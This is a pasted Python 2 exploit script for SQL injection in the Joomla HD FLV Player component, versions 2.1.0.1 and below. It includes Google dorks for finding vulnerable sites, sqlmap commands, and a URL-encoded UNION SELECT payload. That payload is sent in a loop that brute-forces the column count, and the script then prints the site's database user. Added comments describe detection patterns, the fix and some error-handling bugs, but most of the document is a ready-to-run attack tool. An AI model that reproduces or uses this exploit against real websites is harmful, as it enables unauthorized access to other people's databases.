amiralbenz

Joomla HD FLV 2.1.0.1 and below SQL Injection

Jul 11th, 2015
  1. #!/usr/bin/python
  2. #
  3. # Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection
  4. #
  5. # Exploit Author : amiral benz
  6. # Dork google 1: inurl:/component/hdflvplayer/
  7. # Dork google 2: inurl:com_hdflvplayer
  8. #
  9. # Date : 2013-6-10
  10. #
  11. # Poc:
  12. # http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
  13. # http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
  14. #
  15. # Poc sqlmap:
  16. # sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
  17. # sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
  18. #
  19. # http connection
  20. import urllib, urllib2
  21. # string manipulation
  22. import re
  23. # Errors management
  24. import sys
  25. # Args management
  26. import optparse
  27.  
  28. # Check url
def checkurl(url):
    """Require an explicit http:// or https:// scheme on *url*.

    Returns the url unchanged when one of the two schemes is present.
    Otherwise prints an error line and terminates the process with
    exit status 1 (the caller never sees a return value in that case).
    """
    has_scheme = url.startswith("https://") or url.startswith("http://")
    if not has_scheme:
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    return url
  35.  
# Start-up banner, also shown on usage errors. The ASCII art's original
# spacing was not preserved by the paste, and the trailing backslashes on
# some lines act as line continuations inside this non-raw literal.
banner = """
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \
|___| | _ | _ | | | _ | |. 1 |. | \
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'
<= 2.1.0.1 Sql Injection

Written by:

amiral benz
"""
  57.  
# Command-line interface: the single option is the target base URL.
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option(
    '-t',
    '--target',
    action="store",
    help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()

# No target means nothing to do: show the banner and usage, then stop.
if options.target:
    # checkurl() terminates the process itself when the scheme is missing.
    host = checkurl(options.target)
else:
    print(banner)
    commandList.print_help()
    sys.exit(1)
  72.  
# Incremented once per response line that carries the expected XML
# declaration; any value > 0 is taken as "extension present".
checkext = 0

# Single probe. Key: the URL-encoded UNION ALL SELECT delivered through the
# component's `id` parameter. Value: the same path with the payload abbreviated
# for display (it is never read below). The two hex literals inside CONCAT()
# decode to the ASCII markers "h0m3l4b1t" and "t1b4l3m0h" that the response is
# scanned for later. Defender note: a request to option=com_hdflvplayer whose
# id is negative and followed by UNION ALL SELECT plus a run of ",NULL" is the
# pattern to alert on in access or WAF logs; the underlying fix is to stop `id`
# from reaching the query unsanitised (integer cast / parameterised query).
evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }

# Column padding appended once per attempt (",NULL") and the terminator
# (",NULL#") appended after it; "#" comments out the rest of the query.
char = "%2CNULL"
endurl = "%2CNULL%23"
# One of these is added to the progress bar per attempt.
bar = "#"

print(banner)

# Fixed desktop-Chrome User-Agent sent with every request. Because it never
# varies, the exact string is itself a usable fingerprint of this script.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
  84.  
# Fingerprint step: request the component's `languagexml` task and treat a
# UTF-8 XML declaration anywhere in the body as proof the extension is installed.
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")

try:
    req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)
    response = urllib2.urlopen(req).readlines()

    for line_version in response:

        # find() == -1 means "not on this line"; the else branch adds 0 and is a no-op.
        if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:
            checkext += 1
        else:
            checkext += 0

    if checkext > 0:
        sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
    else:
        sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
        sys.exit(1)

# Any non-2xx status (e.g. 404 when the component is absent) is reported as Not Found.
except urllib2.HTTPError:
    sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
    sys.exit(1)

# NOTE(review): urllib2.URLError exposes .reason, not .code (only its subclass
# HTTPError has .code), so a plain connection failure raises AttributeError
# here instead of printing this message.
except urllib2.URLError as e:
    print("\n[X] Connection Error: "+str(e.code))
    sys.exit(1)

print("")
  113.  
# Version step: read the bundled module's manifest and display the text of
# each <version> element found (each overwrites the line, so the last one
# stays visible). The value is informational only; nothing below gates on it.
# Defender note: a world-readable mod_hdflvplayer.xml is the version
# disclosure this step relies on.
sys.stdout.write("\r[+] Checking Version: ")

try:
    req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
    response = urllib2.urlopen(req).readlines()

    for line_version in response:

        if not line_version.find("<version>") == -1:

            # First text between '>' and '<' on the line; assumes the whole
            # element sits on a single line (raises AttributeError otherwise).
            VER = re.compile('>(.*?)<').search(line_version).group(1)

            sys.stdout.write("\r[+] Checking Version: "+str(VER))

# Manifest not served (non-2xx): report Unknown and carry on.
except urllib2.HTTPError:
    sys.stdout.write("\r[+] Checking Version: Unknown")

# NOTE(review): urllib2.URLError has .reason, not .code, so this branch raises
# AttributeError rather than printing the connection error.
except urllib2.URLError as e:
    print("\n[X] Connection Error: "+str(e.code))
    sys.exit(1)

print("")
  136.  
# Probe loop. evilurl holds one entry, and `dork` (the display form) is unused.
# Each attempt appends one more ",NULL" to the UNION SELECT and sends the
# request, for up to 99 attempts. Both the normal response body and the body
# of an HTTP error response are scanned for the "h0m3l4b1t" marker; on a hit
# the text between the two markers (CURRENT_USER() from the payload) is
# printed and the script exits with status 0. Defender note: a run of up to 99
# requests to the same index.php?option=com_hdflvplayer URL, each one ",NULL"
# longer than the last, is the burst pattern to alert on. The unparenthesised
# `print` statements below make this block Python 2 only.
for exploiting, dork in evilurl.iteritems():

    s = ""
    barcount = ""
    for a in range(1,100):

        s += char
        try:
            req = urllib2.Request(host+exploiting+s+endurl, None, headers)
            response = urllib2.urlopen(req).read()

            if "h0m3l4b1t" in response:
                print "\n[!] VULNERABLE"
                current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
                print "[*] Username: "+str(current_user)
                print ""
                print "[*] 3v1l Url: "+host+exploiting+s+endurl
                sys.exit(0)

        # The marker may also appear in a server error page, so the error body
        # is checked the same way before moving to the next attempt.
        except urllib2.HTTPError as e:
            response = e.read()
            if "h0m3l4b1t" in response:
                print "\n[!] VULNERABLE"
                current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
                print "[*] Username: "+str(current_user)
                print ""
                print "[*] 3v1l Url: "+host+exploiting+s+endurl
                sys.exit(0)

        # NOTE(review): urllib2.URLError has .reason, not .code, so a dropped
        # connection raises AttributeError here instead of printing this message.
        except urllib2.URLError as e:
            print("\n[X] Connection Error: "+str(e.code))
            sys.exit(1)

        # Progress bar: one "#" per completed attempt, redrawn in place.
        barcount += bar
        sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
        sys.stdout.flush()

# Reached only when no attempt produced the marker.
print "\n[X] Not vulnerable :("
print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"